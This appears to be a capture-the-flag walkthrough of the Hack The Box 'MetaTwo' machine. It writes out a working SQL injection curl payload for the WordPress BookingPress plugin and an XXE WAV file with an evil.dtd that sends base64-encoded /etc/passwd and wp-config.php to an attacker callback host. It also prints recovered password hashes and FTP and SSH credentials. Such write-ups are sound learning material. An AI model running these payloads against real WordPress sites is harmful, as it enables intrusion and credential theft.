Starting off with nmap - nmap -Pn -p- metatwo.htb -vvvv -oN nmap_initial
We find a port 80 webserver trying to redirecto to metapress.htb lets add that to /etc/hosts and check it.
find a login page @ http://metapress.htb/wp-login.php.
we can start off by checking the site with wpscan
wpscan -e ap --api-token api --url http://metapress.htb -o ~/Documents/htb/MetaTwo/wpscan.2 --plugins-detection mixed
Wordpress bookingpress 1.0.11 Unauthenticated SQL Injection
we find a vulnerability in the /events/ which is the bookingpress plugin.
- https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
Extract the nonce from the source code of the events page and craft a curl command
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \ --data 'action=bookingpress_front_get_category_services&_wpnonce=3392862f44&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
This works and we can also use this exploit to dump the user credentials.
1
2
3
4
5
6
7
8
9
10
11
12
CVE-2022-0739 WordPress BookingPress Plugin< 1.0.11 Unauthenticated SQL Injection
Credentials are:
--------------------------------------------------
Username: admin
Email: admin@metapress.htb
Password: $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
--------------------------------------------------
Username: manager
Email: manager@metapress.htb
Password: $P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70
--------------------------------------------------
Running rockyou for an eternity againse the admin didnt give us anything, and running aginst manager gets us partylikearockstar
WordPress version 5.6.2 Exploitation
Here is a great article explaining the process we will use in the XXE vuln. Basically now that we have credentials we can create a wave file with malicious XML and upload the wave and wordpress will read the metadata and send us back what we want it to read no the system.
We start by generating a WAVE file in bash that contains a payload calling back to the evil.dtd we will setup on attacker
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.123:6969/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
then we create evil.dtd
1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.123:6969/?p=%file;'>" >
And start a webserver in the dir. once we upload we should get a callback with the base64 encoded file which we can decode. So this does work, but /etc/passwd and we find a user jnelson. Unfortunately unable to get the user ssh file. So going to look for the wp-config.php file for more information. /etc/nginx/sites-enabled/default tells us the blog is in /var/www/metapress.htb/blog so lets edit the dtd file to display wp-config.php.
We do find some ftp credentials in here lets check that out
1
2
3
4
5
6
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
And lets upload a reverse shell. Oh no permissions so looking around we find a php-mailer and checknig inside are jnelson’s ssh credentials.
1
2
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
Linux Privesc
Pretty simple, the use has a file with root ssh passwords. cat ssh then su to root